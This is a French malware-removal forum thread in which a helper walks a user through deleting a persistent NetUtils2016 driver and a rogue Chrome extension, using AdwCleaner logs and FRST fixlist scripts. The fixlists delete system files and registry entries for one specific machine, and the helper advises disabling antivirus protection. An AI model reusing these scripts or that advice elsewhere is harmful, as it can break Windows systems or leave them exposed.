C:\AdwCleaner\AdwCleaner[C14].txt - [7041 Bytes] - [25/05/2017 20:10:10]
C:\AdwCleaner\AdwCleaner[C15].txt - [3971 Bytes] - [25/05/2017 20:19:48]
C:\AdwCleaner\AdwCleaner[C16].txt - [1701 Bytes] - [01/06/2017 19:38:00]
C:\AdwCleaner\AdwCleaner[C1].txt - [15507 Bytes] - [15/04/2016 05:00:01]
C:\AdwCleaner\AdwCleaner[C2].txt - [1535 Bytes] - [15/04/2016 21:31:41]
C:\AdwCleaner\AdwCleaner[C3].txt - [3504 Bytes] - [25/04/2016 15:58:51]
C:\AdwCleaner\AdwCleaner[C4].txt - [1021 Bytes] - [15/05/2016 17:46:01]
C:\AdwCleaner\AdwCleaner[C5].txt - [625 Bytes] - [15/05/2016 18:11:31]
C:\AdwCleaner\AdwCleaner[C6].txt - [2671 Bytes] - [19/05/2016 15:37:23]
C:\AdwCleaner\AdwCleaner[C7].txt - [2764 Bytes] - [04/06/2016 02:31:31]
C:\AdwCleaner\AdwCleaner[C8].txt - [13860 Bytes] - [11/05/2017 08:26:44]
C:\AdwCleaner\AdwCleaner[C9].txt - [2825 Bytes] - [11/05/2017 08:33:08]
C:\AdwCleaner\AdwCleaner[S10].txt - [6686 Bytes] - [18/12/2016 23:20:03]
C:\AdwCleaner\AdwCleaner[S11].txt - [14301 Bytes] - [14/02/2017 12:40:34]
C:\AdwCleaner\AdwCleaner[S12].txt - [12992 Bytes] - [11/05/2017 08:26:05]
C:\AdwCleaner\AdwCleaner[S13].txt - [2903 Bytes] - [11/05/2017 08:32:57]
C:\AdwCleaner\AdwCleaner[S14].txt - [2950 Bytes] - [11/05/2017 08:36:03]
C:\AdwCleaner\AdwCleaner[S15].txt - [3620 Bytes] - [11/05/2017 12:02:43]
C:\AdwCleaner\AdwCleaner[S16].txt - [9496 Bytes] - [12/05/2017 21:47:36]
C:\AdwCleaner\AdwCleaner[S17].txt - [4276 Bytes] - [17/05/2017 20:50:28]
C:\AdwCleaner\AdwCleaner[S18].txt - [3864 Bytes] - [24/05/2017 18:47:42]
C:\AdwCleaner\AdwCleaner[S19].txt - [7156 Bytes] - [25/05/2017 20:09:45]
C:\AdwCleaner\AdwCleaner[S1].txt - [15212 Bytes] - [15/04/2016 04:59:13]
C:\AdwCleaner\AdwCleaner[S20].txt - [4047 Bytes] - [25/05/2017 20:19:33]
C:\AdwCleaner\AdwCleaner[S21].txt - [4194 Bytes] - [31/05/2017 22:28:06]
C:\AdwCleaner\AdwCleaner[S22].txt - [4267 Bytes] - [01/06/2017 19:37:47]
C:\AdwCleaner\AdwCleaner[S2].txt - [1238 Bytes] - [15/04/2016 21:30:37]
C:\AdwCleaner\AdwCleaner[S3].txt - [3211 Bytes] - [25/04/2016 15:55:56]
C:\AdwCleaner\AdwCleaner[S4].txt - [1930 Bytes] - [15/05/2016 17:44:14]
C:\AdwCleaner\AdwCleaner[S5].txt - [1700 Bytes] - [15/05/2016 18:07:15]
C:\AdwCleaner\AdwCleaner[S6].txt - [2529 Bytes] - [19/05/2016 15:36:40]
C:\AdwCleaner\AdwCleaner[S7].txt - [4489 Bytes] - [04/06/2016 02:30:13]
C:\AdwCleaner\AdwCleaner[S8].txt - [6902 Bytes] - [14/12/2016 20:15:50]
C:\AdwCleaner\AdwCleaner[S9].txt - [12489 Bytes] - [14/12/2016 20:25:29]
C:\AdwCleaner\AdwCleaner[sczn du11052017.txt - [13863 Bytes] - [11/05/2017 08:31:21]
########## EOF - C:\AdwCleaner\AdwCleaner[C16].txt - [4142 Bytes] ##########
-
https://up.security-x.fr/file.php?h=Rf1db9c688e08bf9ba1bf08db7c339d04
https://up.security-x.fr/file.php?h=Rcc9a821785092247d6f0c4e6193461e9
-
Bonsoir Rzouga,
Tu as un compte Google chrome activé ?
:AAN
-
oui
-
Bonjour Rzouga,
1) On supprime les données synchronisées sur ton compte chrome:
Si tu es connecté à ton compte Google , suis cette procédure pour Arrêter la synchronisation et supprimer les données de Google :
Vous pouvez supprimer les informations synchronisées de votre compte Google à tout moment grâce à Google Dashboard.
1. Cliquez sur la zone d'état dans l'angle inférieur droit de l'écran, là où se trouve la photo du compte.
2. Sélectionnez Paramètres, puis accédez à la section "Utilisateurs".
3. Dans la section "Utilisateurs", cliquez sur Google Dashboard.
4. Repérez la section "Synchronisation de Google Chrome" dans le tableau de bord, puis cliquez sur Arrêter la synchronisation et supprimer les données de Google.
Toutes les informations qui ont été synchronisées avec votre compte sont supprimées, mais elles restent sur votre Chromebook. Cela signifie que des informations telles que les favoris,
les applications et les extensions présents sur le Chromebook ne s'affichent pas si vous activez la synchronisation sur un autre ordinateur.
Support Google Chrome (https://support.google.com/chromebook/answer/1281195?hl=fr)
2) Ensuite, on supprime les lignes néfaste (suit à la lettre la procédure ci-dessous)
/!\ Attention, ce script a été établi uniquement pour le problème de cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnements et endommager Windows. Nous déclinons notre responsabilité en cas d'utilisation abusive malgré nos recommandations. /!\
/!\ Le correctif ne doit être lancés qu'une seule fois afin de ne pas fausser le rapport demandé. /!\
- Exécute FRST./!\ Attention, sous Vista, Windows 7, 8 et 10 , il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
- Clique sur les touches Ctrl + y afin d'ouvrir un fichier fixlist.txt vide
- Copie/colle la totalité du contenu de start à end dans la fenêtre qui vient de s'ouvrir. (clique sur sélectionner==> dans la zone mise en surbrillance bleue, clic droit puis copier. Dans le fenêtre du fichier fixlist, clic droit puis sélectionne coller)
Start
CreateRestorePoint:
CloseProcesses:
U1 NetUtils2016; C:\Windows\system32\drivers\NetUtils2016.sys [909944 2017-06-01] () <==== ATTENTION
C:\Windows\system32\drivers\NetUtils2016.sys
C:\Windows\System32\NetUtils2016.dll
C:\Windows\ZAM.krnl.trace
C:\Windows\ZAM_Guard.krnl.trace
HKU\S-1-5-21-3058809429-2194307388-3191108243-500\...\Run: [HijackThis startup scan] => C:\Program Files (x86)\Trend Micro\HiJackThis\HijackThis.exe /startupscan
C:\Program Files (x86)\Trend Micro
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 - Pas de fichier
CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] -
CHR HKU\S-1-5-21-3058809429-2194307388-3191108243-500\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] -
CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] -
C:\Windows\System32\Tasks\Norton Identity Safe
C:\Windows\System32\Tasks\Norton Anti-Theft
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
EmptyTemp:
End
- Clique sur les touche Ctrl + s pour enregistrer ce fichier (le fichier fixlist.txt est maintenant enregistré au même endroit que FRST).
- Ferme toutes les applications, y compris ton navigateur
- Clique sur Corriger et patiente le temps de la correction et ne fait rien d'autre.
- Le pc va demander à redémarrer, accepte cette condition.
- L'outil a créer un rapport de correction Fixlog.txt sur ton bureau, poste ce rapport sur https://up.security-x.fr/ et fourni le lien généré dans ta prochaine réponse.
Aide en images pour l'hébergement d'un rapport.
(http://forum.security-x.fr/cours-et-tutoriels-322/(tutoriel)-impression-d%27ecran-et-hebergement-de-rapport/msg60884/#msg60884)
Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même
3) Pour finir, tu me refais une nouvelle analyse FRST pour contrôler cette infection coriace.
Sont attendus les rapports:
Fixlog.txt
FRST.txt
Additons.txt
-
Bonsoir Jonathan ;
ci-joint les liens
https://up.security-x.fr/file.php?h=Ref42ba4cd8cfd17429389b0e8cd3d769
https://up.security-x.fr/file.php?h=R3b32d650380ca465c803d120f8ad7b07
https://up.security-x.fr/file.php?h=Rcef1e139e37f3d6a229b6bc5820d3d84
Merci d'avance
-
je viens de faire une analyse netutils toujours present.
-
# AdwCleaner v6.047 - Logfile created 04/06/2017 at 22:41:10
# Updated on 19/05/2017 by Malwarebytes
# Database : 2017-06-02.2 [Server]
# Operating System : Windows 8.1 (X64)
# Username : Administrateur - RACHID
# Running from : C:\Users\Administrateur\Desktop\adwcleaner_6.047.exe
# Mode: Scan
# Support : https://www.malwarebytes.com/support
***** [ Services ] *****
Service Found: NetUtils2016
***** [ Folders ] *****
No malicious folders found.
***** [ Files ] *****
File Found: C:\Windows\SysNative\NetUtils2016.dll
File Found: C:\Windows\SysNative\drivers\NetUtils2016.sys
***** [ DLL ] *****
No malicious DLLs found.
***** [ WMI ] *****
No malicious keys found.
***** [ Shortcuts ] *****
No infected shortcut found.
***** [ Scheduled Tasks ] *****
No malicious task found.
***** [ Registry ] *****
Key Found: [x64] HKLM\SOFTWARE\HDWallpaper
***** [ Web browsers ] *****
No malicious Firefox based browser items found.
No malicious Chromium based browser items found.
*************************
C:\AdwCleaner\AdwCleaner[C10].txt - [2898 Bytes] - [11/05/2017 08:36:24]
C:\AdwCleaner\AdwCleaner[C11].txt - [3629 Bytes] - [11/05/2017 12:03:01]
C:\AdwCleaner\AdwCleaner[C12].txt - [10841 Bytes] - [12/05/2017 21:48:07]
C:\AdwCleaner\AdwCleaner[C13].txt - [4336 Bytes] - [17/05/2017 20:50:47]
C:\AdwCleaner\AdwCleaner[C14].txt - [7041 Bytes] - [25/05/2017 20:10:10]
C:\AdwCleaner\AdwCleaner[C15].txt - [3971 Bytes] - [25/05/2017 20:19:48]
C:\AdwCleaner\AdwCleaner[C16].txt - [4226 Bytes] - [01/06/2017 19:38:00]
C:\AdwCleaner\AdwCleaner[C1].txt - [15507 Bytes] - [15/04/2016 05:00:01]
C:\AdwCleaner\AdwCleaner[C2].txt - [1535 Bytes] - [15/04/2016 21:31:41]
C:\AdwCleaner\AdwCleaner[C3].txt - [3504 Bytes] - [25/04/2016 15:58:51]
C:\AdwCleaner\AdwCleaner[C4].txt - [1021 Bytes] - [15/05/2016 17:46:01]
C:\AdwCleaner\AdwCleaner[C5].txt - [625 Bytes] - [15/05/2016 18:11:31]
C:\AdwCleaner\AdwCleaner[C6].txt - [2671 Bytes] - [19/05/2016 15:37:23]
C:\AdwCleaner\AdwCleaner[C7].txt - [2764 Bytes] - [04/06/2016 02:31:31]
C:\AdwCleaner\AdwCleaner[C8].txt - [13860 Bytes] - [11/05/2017 08:26:44]
C:\AdwCleaner\AdwCleaner[C9].txt - [2825 Bytes] - [11/05/2017 08:33:08]
C:\AdwCleaner\AdwCleaner[S10].txt - [6686 Bytes] - [18/12/2016 23:20:03]
C:\AdwCleaner\AdwCleaner[S11].txt - [14301 Bytes] - [14/02/2017 12:40:34]
C:\AdwCleaner\AdwCleaner[S12].txt - [12992 Bytes] - [11/05/2017 08:26:05]
C:\AdwCleaner\AdwCleaner[S13].txt - [2903 Bytes] - [11/05/2017 08:32:57]
C:\AdwCleaner\AdwCleaner[S14].txt - [2950 Bytes] - [11/05/2017 08:36:03]
C:\AdwCleaner\AdwCleaner[S15].txt - [3620 Bytes] - [11/05/2017 12:02:43]
C:\AdwCleaner\AdwCleaner[S16].txt - [9496 Bytes] - [12/05/2017 21:47:36]
C:\AdwCleaner\AdwCleaner[S17].txt - [4276 Bytes] - [17/05/2017 20:50:28]
C:\AdwCleaner\AdwCleaner[S18].txt - [3864 Bytes] - [24/05/2017 18:47:42]
C:\AdwCleaner\AdwCleaner[S19].txt - [7156 Bytes] - [25/05/2017 20:09:45]
C:\AdwCleaner\AdwCleaner[S1].txt - [15212 Bytes] - [15/04/2016 04:59:13]
C:\AdwCleaner\AdwCleaner[S20].txt - [4047 Bytes] - [25/05/2017 20:19:33]
C:\AdwCleaner\AdwCleaner[S21].txt - [4194 Bytes] - [31/05/2017 22:28:06]
C:\AdwCleaner\AdwCleaner[S22].txt - [4267 Bytes] - [01/06/2017 19:37:47]
C:\AdwCleaner\AdwCleaner[S23].txt - [3305 Bytes] - [04/06/2017 22:41:10]
C:\AdwCleaner\AdwCleaner[S2].txt - [1238 Bytes] - [15/04/2016 21:30:37]
C:\AdwCleaner\AdwCleaner[S3].txt - [3211 Bytes] - [25/04/2016 15:55:56]
C:\AdwCleaner\AdwCleaner[S4].txt - [1930 Bytes] - [15/05/2016 17:44:14]
C:\AdwCleaner\AdwCleaner[S5].txt - [1700 Bytes] - [15/05/2016 18:07:15]
C:\AdwCleaner\AdwCleaner[S6].txt - [2529 Bytes] - [19/05/2016 15:36:40]
C:\AdwCleaner\AdwCleaner[S7].txt - [4489 Bytes] - [04/06/2016 02:30:13]
C:\AdwCleaner\AdwCleaner[S8].txt - [6902 Bytes] - [14/12/2016 20:15:50]
C:\AdwCleaner\AdwCleaner[S9].txt - [12489 Bytes] - [14/12/2016 20:25:29]
C:\AdwCleaner\AdwCleaner[sczn du11052017.txt - [13863 Bytes] - [11/05/2017 08:31:21]
########## EOF - C:\AdwCleaner\AdwCleaner[S23].txt - [4050 Bytes] ##########
-
Bonjour Rzouga,
As tu bien exécuté la procédure de la désactivation de la synchronisation de chrome ainsi que la suppression des données ?
Il manque le rapport FRST.txt mais le rapport Adwcleaner montre que l'infection est encore présente. On procède autrement.
1) Effectue ces procédures: (Par précaution, on sauvegarde Les favoris de chrome).
- Ouvre Google Chrome et clique sur (https://forum.security-x.fr/proxy.php?request=http%3A%2F%2Fup.security-x.fr%2Ffile.php%3Fh%3DR818ac91ad237527f6995f425c473c3be&hash=c099a39f6ed9f91231899ead82dcdd1e66d164af) dans la barre d'outils du navigateur.
- Sélectionne Favoris puis Gestionnaire de favoris
- Dans le gestionnaire, clique sur le menu "Organiser"
- Sélectionne Exporter les favoris vers un fichier html...
- Dans la fenêtre qui s'ouvrira, laisse le nom du fichier indiqué (favoris_05_06_2017) et choisis le bureau comme destination puis clique sur Enregistrer
2) Réinitialisation de chrome:
- Télécharge reset browser (http://www.nicolascoolman.fr/download/resetbrowser/) sur ton Bureau et pas ailleurs.
(https://forum.security-x.fr/proxy.php?request=http%3A%2F%2Fimg11.hostingpics.net%2Fpics%2F568493Capture.png&hash=44d5f7976e7ad520f086d4bfe43023c7e1dc9b1d) (http://www.hostingpics.net/viewer.php?id=568493Capture.png)
- Désactive tes protections de sécurité: antivirus, ... puis ferme Ferme toutes les applications en cours (notamment ton navigateur Google)
- Fait un clic droit sur ResetBrowser et sélectionne exécuter en tant qu'administrateur
- Clique sur le bouton pour Réinitialiser Chrome
- Patiente pendant la réinitialisation.
3) Ensuite, tu me refais une analyse FRST pour contrôler.
Sont attendus le rapport :
FRST.txt
Additions.txt
Jonathan
-
Bonsoir ; mon pc est apparemment toujours infecté.
https://up.security-x.fr/file.php?h=R19b57624ea01d0ff52df4c73e17d51cd
https://up.security-x.fr/file.php?h=R19d472c6dea10eaf5cb8dae5f49eb365
merci
-
Bonsoir Rzouga,
Les données synchronisées sous tes comptes Chromes ( 2 profils détectés) crées des problèmes.
On supprime les lignes néfaste (suit à la lettre la procédure ci-dessous)
/!\ Attention, ce script a été établi uniquement pour le problème de cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnements et endommager Windows. Nous déclinons notre responsabilité en cas d'utilisation abusive malgré nos recommandations. /!\
/!\ Le correctif ne doit être lancés qu'une seule fois afin de ne pas fausser le rapport demandé. /!\
- Exécute FRST./!\ Attention, sous Vista, Windows 7, 8 et 10 , il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
- Clique sur les touches Ctrl + y afin d'ouvrir un fichier fixlist.txt vide
- Copie/colle la totalité du contenu de start à end dans la fenêtre qui vient de s'ouvrir. (clique sur sélectionner==> dans la zone mise en surbrillance bleue, clic droit puis copier. Dans le fenêtre du fichier fixlist, clic droit puis sélectionne coller)
Start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-3058809429-2194307388-3191108243-500\...\StartupApproved\Run: => "HijackThis startup scan"
CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] -
CHR HKU\S-1-5-21-3058809429-2194307388-3191108243-500\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] -
CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] -
R1 NetUtils2016; C:\Windows\system32\drivers\NetUtils2016.sys [909944 2017-06-04] () <==== ATTENTION
2017-06-04 22:25 - 2017-06-06 21:02 - 00625272 _____ C:\Windows\system32\NetUtils2016.dll
2017-06-04 22:24 - 2017-06-04 22:24 - 00909944 _____ C:\Windows\system32\Drivers\NetUtils2016.sys
2017-06-06 21:02 - 2017-06-06 21:27 - 00102234 _____ C:\Windows\ZAM.krnl.trace
2017-06-06 21:02 - 2017-06-06 21:27 - 00072835 _____ C:\Windows\ZAM_Guard.krnl.trace
EmptyTemp:
End
- Clique sur les touche Ctrl + s pour enregistrer ce fichier (le fichier fixlist.txt est maintenant enregistré au même endroit que FRST).
- Ferme toutes les applications, y compris ton navigateur Chrome
- Clique sur Corriger et patiente le temps de la correction et ne fait rien d'autre.
- Le pc va demander à redémarrer, accepte cette condition.
- L'outil a créer un rapport de correction Fixlog.txt sur ton bureau, poste ce rapport sur https://up.security-x.fr/ et fourni le lien généré dans ta prochaine réponse.
Attention, au redémarrage de ton PC, utilise Firefox comme moteur de recherche et non Google Chrome.
Aide en images pour l'hébergement d'un rapport.
(http://forum.security-x.fr/cours-et-tutoriels-322/(tutoriel)-impression-d%27ecran-et-hebergement-de-rapport/msg60884/#msg60884)
Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même
Refait un analyse FRST.
Pour poster les rapports, j'insiste sur le fait que tu dois impérativement utiliser Firefox comme moteur de recherche sinon tu fausses l'analyse
Sont attendus les rapports:
Fixlog.txt
FRST.txt
Additions.txt
Jonathan
-
Bonsoir Rzouga,
:EEE Le rapport additions.txt du 06-06-2017 21:27:35 montre que tu as créé un nouveau profil chrome (profil 1) alors que depuis le début de la désinfection le profil chrome utilisé était le profil 2: peux-tu m'expliquer pourquoi avoir pris cette décision volontaire pendant la prise en charge de la désinfection au risque de fausser les analyses des rapports ?
ShortcutWithArgument: C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk
-> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
Jonathan
-
Bonsoir Jonathan ;
Je ne savais pas que cela pouvais fausser ou entraver ton travail de désinfection de mon pc, j'en suis désolé en fait comme tu as du le voir
je n'y connais pas grand chose.
https://up.security-x.fr/file.php?h=R2b6e9ce9fe84c12a971f2df23b3af068
https://up.security-x.fr/file.php?h=R298baf2993c5d95c68ac970cffd9356b
https://up.security-x.fr/file.php?h=R7532796e5084b88886b33253af0d812c
Merci
-
Bonjour Rzouga,
Je ne savais pas que cela pouvais fausser ou entraver ton travail de désinfection de mon pc, j'en suis désolé en fait comme tu as du le voir
je n'y connais pas grand chose.
Autant pour moi: dans mon poste initial, j'aurais du préciser de ne rien faire qui puisse interféré la désinfection.
On procède autrement.
- Ouvres Chrome et cliques sur (https://up.security-x.fr/file.php?h=R9d7640d06f1d5653686a50f8fcafd2e4) en haut à droite.
- Cliques sur paramètres
- Cliques sur Synchronisation sous ton profil
- Cliques sur Gérer les données synchronisées dans Google Dashboard
- En bas , cliques sur Redémarrer la synchronisation
- Cela va te déconnecter de Chrome .
Toutes les informations qui ont été synchronisées avec votre compte sont supprimées, mais elles restent sur votre Chromebook. Cela signifie que des informations telles que les favoris, les applications et les extensions présents sur le Chromebook ne s'affichent pas si vous activez la synchronisation sur un autre ordinateur.
/!\ Attention, ce script a été établi uniquement pour le problème de cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnements et endommager Windows. Nous déclinons notre responsabilité en cas d'utilisation abusive malgré nos recommandations. /!\
/!\ Le correctif ne doit être lancés qu'une seule fois afin de ne pas fausser le rapport demandé. /!\
- Exécute FRST./!\ Attention, sous Vista, Windows 7, 8 et 10 , il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
- Clique sur les touches Ctrl + y afin d'ouvrir un fichier fixlist.txt vide
- Copie/colle la totalité du contenu de start à end dans la fenêtre qui vient de s'ouvrir. (clique sur sélectionner==> dans la zone mise en surbrillance bleue, clic droit puis copier. Dans le fenêtre du fichier fixlist, clic droit puis sélectionne coller)
Start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-3058809429-2194307388-3191108243-500\...\StartupApproved\Run: => "HijackThis startup scan"
CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] -
CHR HKU\S-1-5-21-3058809429-2194307388-3191108243-500\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] -
CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] -
R1 NetUtils2016; C:\Windows\system32\drivers\NetUtils2016.sys [909944 2017-06-04] () <==== ATTENTION
2017-06-04 22:25 - 2017-06-06 21:02 - 00625272 _____ C:\Windows\system32\NetUtils2016.dll
2017-06-04 22:24 - 2017-06-04 22:24 - 00909944 _____ C:\Windows\system32\Drivers\NetUtils2016.sys
2017-06-06 21:02 - 2017-06-06 21:27 - 00102234 _____ C:\Windows\ZAM.krnl.trace
2017-06-06 21:02 - 2017-06-06 21:27 - 00072835 _____ C:\Windows\ZAM_Guard.krnl.trace
Hosts:
EmptyTemp:
End
- Clique sur les touche Ctrl + s pour enregistrer ce fichier (le fichier fixlist.txt est maintenant enregistré au même endroit que FRST).
- Ferme toutes les applications, y compris ton navigateur
- Clique sur Corriger et patiente le temps de la correction et ne fait rien d'autre.
- Le pc va demander à redémarrer, accepte cette condition.
- L'outil a créer un rapport de correction Fixlog.txt sur ton bureau, poste ce rapport sur https://up.security-x.fr/ et fourni le lien généré dans ta prochaine réponse.
Aide en images pour l'hébergement d'un rapport. (http://forum.security-x.fr/cours-et-tutoriels-322/(tutoriel)-impression-d%27ecran-et-hebergement-de-rapport/msg60884/#msg60884)
Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même
3) Tu me refais une nouvelle analyse FRST.
Sont attendus les rapports:
Fixlog.txt
FRST.txt
Additons.txt
Jonathan
-
Bonjour Rzouga, :AAC
Juste un message pour relancer ton sujet.
Jonathan